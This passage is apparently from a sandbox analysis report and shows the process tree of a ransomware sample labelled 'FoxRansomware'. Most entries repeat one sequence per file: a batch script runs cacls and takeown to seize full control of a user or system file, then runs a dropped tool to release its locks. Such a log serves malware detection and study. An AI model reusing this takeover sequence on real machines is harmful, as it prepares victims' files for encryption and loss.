C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin"3⤵PID:5848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000085.bin" -nobanner3⤵PID:6096
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000085.bin" -nobanner4⤵PID:7744
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin""2⤵PID:2012
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin" /E /G Admin:F /C3⤵PID:2676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin"3⤵PID:6296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000008R.bin" -nobanner3⤵PID:7728
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000008R.bin" -nobanner4⤵PID:6848
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin""2⤵PID:7772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin" /E /G Admin:F /C3⤵PID:5656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin"3⤵PID:7120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000083.bin" -nobanner3⤵PID:8028
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000083.bin" -nobanner4⤵PID:7912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin""2⤵PID:7252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin" /E /G Admin:F /C3⤵PID:8024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin"3⤵PID:2292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009H.bin" -nobanner3⤵PID:7796
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000009H.bin" -nobanner4⤵PID:7904
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin""2⤵PID:660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin" /E /G Admin:F /C3⤵PID:5168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin"3⤵PID:2248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AD.bin" -nobanner3⤵PID:3264
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000AD.bin" -nobanner4⤵PID:7900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin""2⤵PID:7376
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin" /E /G Admin:F /C3⤵PID:5596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin"3⤵PID:7260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AN.bin" -nobanner3⤵PID:3708
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000AN.bin" -nobanner4⤵PID:5524
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin""2⤵PID:8064
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin" /E /G Admin:F /C3⤵PID:4864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin"3⤵PID:7652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000B3.bin" -nobanner3⤵PID:5404
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000B3.bin" -nobanner4⤵PID:5852
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin""2⤵PID:7732
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin" /E /G Admin:F /C3⤵PID:5784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin"3⤵
- Modifies file permissions
PID:5904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009F.bin" -nobanner3⤵PID:4496
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000009F.bin" -nobanner4⤵PID:7684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin""2⤵PID:3012
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin" /E /G Admin:F /C3⤵PID:2612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin"3⤵PID:5860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AL.bin" -nobanner3⤵PID:4476
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000AL.bin" -nobanner4⤵PID:6728
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin""2⤵PID:6764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin" /E /G Admin:F /C3⤵PID:5776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin"3⤵PID:2908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000B1.bin" -nobanner3⤵PID:5772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000B1.bin" -nobanner4⤵PID:2604
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:4704
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:2928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:7268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "overlay.png" -nobanner3⤵PID:4524
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "overlay.png" -nobanner4⤵PID:8052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:2572
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:8072
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:8132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:2824
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:4200
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""2⤵PID:4988
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C3⤵PID:6984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"3⤵
- Modifies file permissions
PID:4028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner3⤵PID:8168
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner4⤵PID:5948
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""2⤵PID:5752
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C3⤵PID:4252
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"3⤵PID:6300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner3⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner4⤵PID:3388
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""2⤵PID:5744
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C3⤵PID:1572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"3⤵
- Modifies file permissions
PID:1584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner3⤵PID:2128
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner4⤵PID:7548
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:2464
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:3448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵PID:6324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:5048
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:6336
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin""2⤵PID:2564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin" /E /G Admin:F /C3⤵PID:5180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin"3⤵PID:5192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000F.bin" -nobanner3⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000F.bin" -nobanner4⤵PID:2220
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin""2⤵PID:5556
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin" /E /G Admin:F /C3⤵PID:1124
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin"3⤵PID:7256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000Q.bin" -nobanner3⤵PID:6280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000Q.bin" -nobanner4⤵PID:6344
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin""2⤵PID:5512
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin" /E /G Admin:F /C3⤵PID:304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin"3⤵PID:6332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000014.bin" -nobanner3⤵PID:4068
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000014.bin" -nobanner4⤵PID:6068
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:4272
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:5240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:3572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin""2⤵PID:8136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin" /E /G Admin:F /C3⤵PID:6808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin"3⤵PID:1884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000058.bin" -nobanner3⤵PID:4696
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000058.bin" -nobanner4⤵PID:1536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin""2⤵PID:6100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin" /E /G Admin:F /C3⤵PID:5916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin"3⤵PID:5220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007E.bin" -nobanner3⤵PID:3032
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007E.bin" -nobanner4⤵PID:4584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin""2⤵PID:7468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin" /E /G Admin:F /C3⤵PID:5288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin"3⤵PID:5504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007O.bin" -nobanner3⤵PID:6868
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007O.bin" -nobanner4⤵PID:5800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin""2⤵PID:940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin" /E /G Admin:F /C3⤵PID:1388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin"3⤵
- Modifies file permissions
PID:7472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000008D.bin" -nobanner3⤵PID:2816
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000008D.bin" -nobanner4⤵PID:5344
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin""2⤵PID:5548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin" /E /G Admin:F /C3⤵PID:7092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin"3⤵
- Modifies file permissions
PID:7788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000008N.bin" -nobanner3⤵PID:7360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000008N.bin" -nobanner4⤵PID:5636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin""2⤵PID:3144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin" /E /G Admin:F /C3⤵PID:7172
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin"3⤵
- Modifies file permissions
PID:7464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000093.bin" -nobanner3⤵PID:6860
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000093.bin" -nobanner4⤵PID:5644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin""2⤵PID:7164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin" /E /G Admin:F /C3⤵PID:7668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin"3⤵
- Modifies file permissions
PID:6732
